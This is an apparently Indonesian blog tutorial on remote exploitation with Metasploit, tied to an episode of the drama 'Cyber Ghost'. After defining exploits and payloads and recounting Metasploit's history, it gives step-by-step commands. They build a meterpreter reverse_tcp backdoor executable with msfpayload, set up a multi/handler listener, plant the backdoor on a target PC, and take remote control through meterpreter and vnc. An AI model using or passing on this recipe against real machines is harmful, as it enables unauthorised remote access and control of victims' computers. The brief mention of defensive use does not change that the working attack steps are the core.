Remote Exploit

Apa itu exploit?

Exploit adalah kode yang berfungsi untuk mencari kelemahan (Vulnerability) pada software korban(misal web browser), setelah berhasil mengeksploitasinya exploit tersebut memasukkan payload ke dalam memori korban. Payload merupakan sebuah executable milik penyerang yang akan di run pada komputer korban dengan tujuan dapat mengendalikan komputer tersebut secara remote atau memasang backdoor, trojan, virus, worm, dan lain-lain. Terlepas dari penggunaan metasploit yang disalah gunakan untuk kejahatan, software ini juga membantu System Security untuk memperkuat pertahanan jaringannya dari ulah penyerang dari luar.

Remote exploit (eksploit jarak jauh) bekerja melalui jaringan dan mengeksploitasi celah keamanan tanpa adanya akses terlebih dahulu ke sistem korban. Local exploit (eksploit lokal) mengharuskan adanya akses terlebih dahulu ke sistem yang rentan dan biasanya meningkatkan keleluasaan orang yang menjalankan exploit melebihi yang diberikan oleh administrator sistem.

sumber: wikipedia

Nah, kali ini saya akan membahas mengenai Remote exploit yg ada pada film Drama “Cyber Ghost” pada episode 1. Ada sebuah software yang digunakan untuk meremote PC / Laptop secara jarak jauh dalam satu jaringan. Software tersebut adalah metasploit untuk lebih jelasnya apa itu metasploit, berikut penjelasannya.

load img
msfconsole
load img
running metasploit
load img
Remoting Target

Pengertian metasploit
Metasploit merupakan sofware security yang sering digunakan untuk menguji coba ketahanan suatu sistem dengan cara mengeksploitasi kelemahan software suatu sistem.

Metasploit diciptakan oleh HD Moore pada tahun 2003 sebagai sebuah alat jaringan portabel menggunakan bahasa scripting Perl. Kemudian, Metasploit Framework benar-benar ditulis ulang dalam bahasa pemrograman Ruby. Pada tanggal 21 Oktober 2009, Proyek Metasploit mengumumkan yang telah diakuisisi oleh Rapid7, sebuah perusahaan keamanan yang menyediakan solusi kerentanan manajemen terpadu.
Seperti produk komersial yang sebanding seperti kanvas Imunitas atau Inti Dampak Core Security Technologies, Metasploit dapat digunakan untuk menguji kerentanan sistem komputer untuk melindungi mereka atau untuk masuk ke sistem remote. Seperti alat-alat keamanan banyak informasi, Metasploit dapat digunakan untuk kegiatan baik yang sah dan tidak sah. Sejak akuisisi dari Metasploit Framework.

Metasploit biasanya digunakan untuk menyerang application layer dengan 0 day attack yang merupakan metode penyerangan pada software yang belum di patch. Metasploit biasa dikaitkan dengan istilah remote exploitation, maksudnya penyerang berada pada jarak jangkauan yang jauh dapat mengendalikan komputer korban. Metasploit menyerang dengan cara mengirimkan exploit pada komputer korban. Exploit ini berisi payload yang sudah ditentukan oleh penyerang. Untuk mencari exploit terupdate bisa mengakses di website www.exploit-db.com .

load img
www.exploit-db.com
load img
contoh payload

Contoh payload dari gambar diatas ditulis menggunakan bahasa python dan shellcode, yang digunakan untuk menanamkan file tersebut kedalam komputer korban.

Metasploit
Langkah-langkah dasar untuk mengeksploitasi sebuah sistem dengan menggunakan metasploit:

1. Jalankan msfconsole.

load img
run msfconsole

2.  Buat backdoor dengan cara msfpayload windows/meterpreter/reverse_tcp lhost=192.168.43.154 lport=4444 x > backdoors.exe

load img
Keterangan : Lhost adalah alamat dari laptop sendiri (IP address), untuk melihat ip address caranya ifconfig

Contoh file backdoors yg telah dibuat

load img
backdoors.exe

3.  Buka Metasploit, Masuk Ke Multi/Handler dengan cara : use multi/handler

load img
use multi/handler

4.  Setting Lport dan Lhost

   - set lport 4444

   - set lhost 192.168.43.154
load img
set lhost dan lport

5.  Setting payload : set payload windows/meterpreter/reverse_tcp

load img
Setting Payload

6.  Jalankan exploit

load img
exploit

7.  Copy Backdoor yang telah dibuat dan Pindahkan Ke PC target.

 8.  Ketika exploit telah berjalan maka telah bisa masuk ke PC target tersebut dengan ditandai perintah meterpreter>
load img
meterpreter
 9. Jalankan perintah vnc  untuk meremote.

untuk lebih jelasnya bisa dilihat Contoh Video